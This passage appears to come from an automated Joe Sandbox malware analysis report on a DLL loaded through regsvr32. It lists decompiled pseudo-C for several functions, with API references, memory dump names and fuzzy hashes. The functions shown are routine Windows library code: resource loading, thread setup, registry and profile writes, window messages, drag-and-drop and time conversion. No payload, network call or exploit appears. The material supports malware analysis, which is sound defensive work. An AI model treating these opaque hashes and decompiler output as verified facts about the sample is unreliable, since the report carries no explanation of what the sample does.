						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

0x1001bb10
0x1001bb11
0x1001bb14
0x1001bb16
0x1001bb1d
0x1001bb20
0x1001bb23
0x1001bb2a
0x1001bb41
0x1001bb41
0x1001bb48
0x1001bb53
0x1001bb53
0x1001bb57
0x1001bb5a
0x1001bb62
0x1001bb64
0x1001bb73
0x1001bb77
0x1001bb66
0x1001bb66
0x1001bb69
0x1001bb6d
0x1001bb6d
0x1001bb80
0x1001bb8c
0x1001bb8c
0x1001bb80
0x1001bb92
0x1001bb97
0x1001bb97
0x1001bba3

APIs

FindResourceA.KERNEL32 ref: 1001BB33
LoadResource.KERNEL32(?,00000000), ref: 1001BB3B
LockResource.KERNEL32(00000000), ref: 1001BB4D
FreeResource.KERNEL32(00000000), ref: 1001BB97

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 21390bd7aac50927cd41fd487d0f740c7bdb04cca7142f3f17de887c8a18310c
Instruction ID: 0eb972119714696451402e669bdf57dc20bcf58fed3d00780577fdfd15a11bb1
Opcode Fuzzy Hash: 21390bd7aac50927cd41fd487d0f740c7bdb04cca7142f3f17de887c8a18310c
Instruction Fuzzy Hash: 3711BF74504B15EFD710DF51C8C9BAAB3F8FF012A5F108059E94257954D3B4ED80DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10019C28 Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10019C28(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E1004764D(0x1008ed88, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E1001A40B(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x1009c6f4;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = L1004C810( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1001E302(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E1000A069(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E1001988F(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E10047725(_t51);
			}

0x10019c28
0x10019c28
0x10019c28
0x10019c28
0x10019c2f
0x10019c34
0x10019c36
0x10019c39
0x10019c40
0x10019c43
0x10019c46
0x10019c4c
0x10019c5c
0x10019c4e
0x10019c51
0x10019c56
0x10019c57
0x10019c57
0x10019c64
0x10019c66
0x10019c68
0x10019c6a
0x10019c6a
0x10019c6a
0x10019c6f
0x10019c6f
0x10019c72
0x10019c79
0x00000000
0x00000000
0x10019c7b
0x10019c84
0x10019c8d
0x10019c90
0x10019c93
0x10019c96
0x10019c99
0x10019c9c
0x10019c9f
0x10019ca2
0x10019ca5
0x10019cab
0x10019cae
0x10019cb5
0x10019cbc
0x10019cbf
0x10019cc5
0x10019ccb
0x10019cd1
0x10019cd4
0x10019cd7
0x10019cdd
0x10019ce3
0x10019ce6
0x10019ce9
0x10019cfa

APIs

__EH_prolog3.LIBCMT ref: 10019C2F

Part of subcall function 1001A40B: __EH_prolog3.LIBCMT ref: 1001A412

__strdup.LIBCMT ref: 10019C51
GetCurrentThread.KERNEL32(00000004,10002EB9,00000000), ref: 10019C7E
GetCurrentThreadId.KERNEL32 ref: 10019C87

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: c3b3984c62bacbd36d5cc92ad9ca2300cd357f5d6ec69e28e01614a3e862823a
Instruction ID: 08193193464e78a0f338aeecd604293388332540e588b7c863b14edbaf8c935c
Opcode Fuzzy Hash: c3b3984c62bacbd36d5cc92ad9ca2300cd357f5d6ec69e28e01614a3e862823a
Instruction Fuzzy Hash: 882190B0800B508FD321DF2A854524AFBE8FFA0740F10891FE5AA87622CBB0A481DF44

Uniqueness

Uniqueness Score: -1.00%

Function 10043F4D Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10043F4D(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t32;
				int _t36;
				void* _t46;

				_push(__ecx);
				_push(__ecx);
				_t46 = __ecx;
				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t36, _t21);
				OffsetRect(_t46 + 0x48, _t36, _v8);
				OffsetRect(_t46 + 0x38, _t36, _v8);
				OffsetRect(_t46 + 0x58, _t36, _v8);
				_t48 =  *((intOrPtr*)(_t46 + 0x80));
				 *((intOrPtr*)(_t46 + 4)) = _a4;
				 *((intOrPtr*)(_t46 + 8)) = _a8;
				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
					_t32 = E100439DF();
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
				return E10043DEE(_t46, _t48, 0);
			}

0x10043f50
0x10043f51
0x10043f57
0x10043f5f
0x10043f6b
0x10043f6e
0x10043f76
0x10043f80
0x10043f8a
0x10043f94
0x10043f96
0x10043fa0
0x10043fa6
0x10043fa9
0x10043fb1
0x10043fab
0x10043fab
0x10043fab
0x10043fba
0x10043fc6

APIs

OffsetRect.USER32 ref: 10043F76
OffsetRect.USER32 ref: 10043F80
OffsetRect.USER32 ref: 10043F8A
OffsetRect.USER32 ref: 10043F94

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: 10ba8cf307fc1ee194453d2be39fa243ce68c423d7bb49e5b94edb7717c06be9
Instruction ID: ad087f104e08c8dc69baa1358e980ee4299902bd1e2e8011736340b443768c7d
Opcode Fuzzy Hash: 10ba8cf307fc1ee194453d2be39fa243ce68c423d7bb49e5b94edb7717c06be9
Instruction Fuzzy Hash: 19110C71A00709AFDB10DFA9C985D9BB7ECEB48254B10882AF54AD7610D670FE449B60

Uniqueness

Uniqueness Score: -1.00%

Function 10025FFB Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10025FFB(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E1004C19A( &_v24, 0x10, 0x1009d478, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10025F4C(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E1004763E(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

0x10025ffb
0x10026001
0x10026008
0x1002600c
0x10026010
0x10026017
0x1002601a
0x1002605a
0x1002606b
0x1002601c
0x10026022
0x10026026
0x10026034
0x1002603b
0x1002603d
0x10026047
0x10026047
0x10026026
0x1002607f

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10026034
RegCloseKey.ADVAPI32(00000000), ref: 1002603D
_swprintf.LIBCMT ref: 1002605A
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002606B

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: ecc0c1e1ae1d5184763d5de5863195a65147cc483bfe43b30b9c9aca3f2aaf1c
Instruction ID: e1688f579dca54ba37b2dca936e62701f3f568ae60a6af65198550ab68664cd0
Opcode Fuzzy Hash: ecc0c1e1ae1d5184763d5de5863195a65147cc483bfe43b30b9c9aca3f2aaf1c
Instruction Fuzzy Hash: B001A976500219ABEB10EF688D81FAFB3ACEB09604F50056AFA01E7181DA74FD0497A4

Uniqueness

Uniqueness Score: -1.00%

Function 100163C0 Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E100163C0(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				L10014BE6(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E10015912(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					L10014BE6(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x100b8618;
					L10048E48( &_v20, 0x100aff30);
					asm("int3");
					_push(4);
					E1004764D(0x1008dd26, 0, SendMessageA, _t33);
					_t29 = E10020454(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1001DB72(_t29);
					}
					return E10047725(_t24);
				}
			}

0x100163c0
0x100163c0
0x100163c2
0x100163cf
0x100163d1
0x100163d3
0x100163d5
0x100163d5
0x100163db
0x100163ea
0x100163f7
0x100163fc
0x10016403
0x10016407
0x10016415
0x10016422
0x10016427
0x1001642f
0x10016436
0x10016436
0x1001643b
0x10016409
0x1000a06c
0x1000a076
0x1000a07d
0x1000a082
0x1000a083
0x1000a08a
0x1000a099
0x1000a09b
0x1000a09e
0x1000a0a2
0x1000a0a5
0x1000a0a7
0x1000a0a7
0x1000a0b1
0x1000a0b1

APIs

SendMessageA.USER32 ref: 100163EA
SendMessageA.USER32 ref: 10016415

Part of subcall function 10014BE6: GetTopWindow.USER32(?), ref: 10014BF4

GetCapture.USER32 ref: 10016427
SendMessageA.USER32 ref: 10016436

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: a0efcb6364b0c9d389cf4b23c1236720dfbb6099423cd28568ba9601b1c5d6f1
Instruction ID: 614349e7e5f11e2e6eee7cd7448c617cf19cc0822f6615fa638ab2828d8a9c26
Opcode Fuzzy Hash: a0efcb6364b0c9d389cf4b23c1236720dfbb6099423cd28568ba9601b1c5d6f1
Instruction Fuzzy Hash: 420184B5354619BFF6306B208CC9FBA76ADFB8C785F020174F285AA1A2C6A1DC405560

Uniqueness

Uniqueness Score: -1.00%

Function 1001F85F Relevance: 6.1, APIs: 4, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001F85F(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4, intOrPtr _a8, long* _a12) {
				int _t32;
				intOrPtr* _t34;

				_t34 = _a4;
				L1001ECA1(__ebx, _t34, _a8);
				E100176B3( *((intOrPtr*)(_t34 + 4)), _a8,  &_a4);
				if( *_t34 == 0) {
					return SendMessageA(_a4, 0x18c, 0xffffffff,  *_a12);
				}
				_t32 = SendMessageA(_a4, 0x188, 0, 0);
				if(_t32 == 0xffffffff) {
					L100011D1(_a12);
				} else {
					SendMessageA(_a4, 0x189, _t32, E100103E6(_a12, SendMessageA(_a4, 0x18a, _t32, 0)));
				}
				return E1000FED3(_a12, 0xffffffff);
			}

0x1001f863
0x1001f86b
0x1001f87a
0x1001f882
0x00000000
0x1001f8e8
0x1001f899
0x1001f89e
0x1001f8c7
0x1001f8a0
0x1001f8c0
0x1001f8c0
0x00000000

APIs

Part of subcall function 100176B3: GetDlgItem.USER32(?,?), ref: 100176C0

SendMessageA.USER32 ref: 1001F897
SendMessageA.USER32 ref: 1001F8AB
SendMessageA.USER32 ref: 1001F8C0
SendMessageA.USER32 ref: 1001F8E8

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: bb8b93b29cdc21a8c4604f398b5d1714dde87c5f0dfe301a4339b9996be58f67
Instruction ID: 45fc29c7d7c029048f8d83dbd686a3256d7bfa0c3ff2d01b983806ece7dddab6
Opcode Fuzzy Hash: bb8b93b29cdc21a8c4604f398b5d1714dde87c5f0dfe301a4339b9996be58f67
Instruction Fuzzy Hash: BA115B35640158BBDF11DF54CC01FEE3B6AEF857A0F10822AB9255F1E0CB70A991EB90

Uniqueness

Uniqueness Score: -1.00%

Function 10035D3C Relevance: 6.1, APIs: 4, Instructions: 53
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10035D3C(void* __ecx, intOrPtr __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t39;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t45;
				signed int _t46;
				void* _t48;
				void* _t51;

				_t51 = __eflags;
				_t39 = __edx;
				_t34 = __ecx;
				_t46 = _t48 - 0x90;
				_t19 =  *0x100b9e70; // 0x6fb3f782
				 *(_t46 + 0x8c) = _t19 ^ _t46;
				_t32 =  *(_t46 + 0x98);
				_push(_t40);
				E10013FEA(_t32, _t34, _t46, SetActiveWindow( *(__ecx + 0x20)));
				 *((intOrPtr*)(_t46 - 0x80)) = DragQueryFileA(_t32, 0xffffffff, 0, 0);
				_t25 = E1001E302(_t32, _t40, DragQueryFileA, _t51);
				 *(_t46 - 0x7c) =  *(_t46 - 0x7c) & 0x00000000;
				_t41 =  *((intOrPtr*)(_t25 + 4));
				if( *((intOrPtr*)(_t46 - 0x80)) > 0) {
					do {
						DragQueryFileA(_t32,  *(_t46 - 0x7c), _t46 - 0x78, 0x104);
						 *((intOrPtr*)( *_t41 + 0x88))(_t46 - 0x78);
						 *(_t46 - 0x7c) =  *(_t46 - 0x7c) + 1;
						_t25 =  *(_t46 - 0x7c);
					} while ( *(_t46 - 0x7c) <  *((intOrPtr*)(_t46 - 0x80)));
				}
				DragFinish(_t32);
				_pop(_t42);
				_pop(_t45);
				_pop(_t33);
				return E1004763E(_t25, _t33,  *(_t46 + 0x8c) ^ _t46, _t39, _t42, _t45);
			}

0x10035d3c
0x10035d3c
0x10035d3c
0x10035d3d
0x10035d4a
0x10035d51
0x10035d58
0x10035d5f
0x10035d6c
0x10035d80
0x10035d83
0x10035d88
0x10035d90
0x10035d93
0x10035d95
0x10035da2
0x10035dac
0x10035db2
0x10035db5
0x10035db8
0x10035d95
0x10035dbe
0x10035dca
0x10035dcb
0x10035dce
0x10035ddb

APIs

SetActiveWindow.USER32(?), ref: 10035D65
DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10035D7E
DragQueryFileA.SHELL32(?,?,?,00000104), ref: 10035DA2
DragFinish.SHELL32(?), ref: 10035DBE

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: 3718def05f9739276a207ff4cb5d5e017117bdfa14ff6b46d5fbc272c63a4aaf
Instruction ID: abc6094ae129ad0afedea263d3c1b8f41d37affee122529c0778764e6e2a1fb5
Opcode Fuzzy Hash: 3718def05f9739276a207ff4cb5d5e017117bdfa14ff6b46d5fbc272c63a4aaf
Instruction Fuzzy Hash: EF114F719001189FEB20DBB8CC89FEDB7B9FF08315F114559E52597192DB75A9448F20

Uniqueness

Uniqueness Score: -1.00%

Function 10039067 Relevance: 6.1, APIs: 4, Instructions: 52
timeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10039067(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				char _v36;
				intOrPtr _v48;
				void* __ebp;
				short _t24;
				int _t27;
				int _t29;
				intOrPtr _t38;
				intOrPtr _t48;
				void* _t55;
				void* _t58;

				_t49 = __edi;
				_t40 = __ebx;
				_t55 = _t58;
				if(_a8 != 0) {
					_push(__esi);
					_v28.wYear = L10038E4E();
					_v28.wMonth = L10038E6E();
					_v28.wDay = L10038E8A();
					_v28.wHour = L10038EA5();
					_v28.wMinute = L10038EC1();
					_t24 = L10038EDD();
					_v28.wMilliseconds = _v28.wMilliseconds & 0x00000000;
					_v28.wSecond = _t24;
					_t27 = SystemTimeToFileTime( &_v28,  &_v12);
					_t52 = GetLastError;
					if(_t27 == 0) {
						L10034B40(__ebx, __edi, GetLastError, _t55, GetLastError(), 0);
					}
					_t29 = LocalFileTimeToFileTime( &_v12, _a8);
					if(_t29 == 0) {
						_t29 = L10034B40(_t40, _t49, _t52, _t55, GetLastError(), _t29);
					}
					return _t29;
				} else {
					_push(_t55);
					_push(__ecx);
					_v36 = 0x100b8618;
					L10048E48( &_v36, 0x100aff30);
					asm("int3");
					_push(4);
					E1004764D(0x1008dd26, __ebx, __edi, __esi);
					_t48 = E10020454(0x104);
					_v48 = _t48;
					_t38 = 0;
					_v36 = 0;
					if(_t48 != 0) {
						_t38 = E1001DB72(_t48);
					}
					return E10047725(_t38);
				}
			}

0x10039067
0x10039067
0x10039068
0x10039071
0x10039078
0x10039085
0x10039090
0x1003909b
0x100390a6
0x100390b1
0x100390b5
0x100390ba
0x100390bf
0x100390cb
0x100390d3
0x100390d9
0x100390e0
0x100390e0
0x100390ec
0x100390f4
0x100390fa
0x100390fa
0x10039101
0x10039073
0x1000a069
0x1000a06c
0x1000a076
0x1000a07d
0x1000a082
0x1000a083
0x1000a08a
0x1000a099
0x1000a09b
0x1000a09e
0x1000a0a2
0x1000a0a5
0x1000a0a7
0x1000a0a7
0x1000a0b1
0x1000a0b1

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 100390CB
GetLastError.KERNEL32(00000000), ref: 100390DD
LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 100390EC
GetLastError.KERNEL32(00000000), ref: 100390F7

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
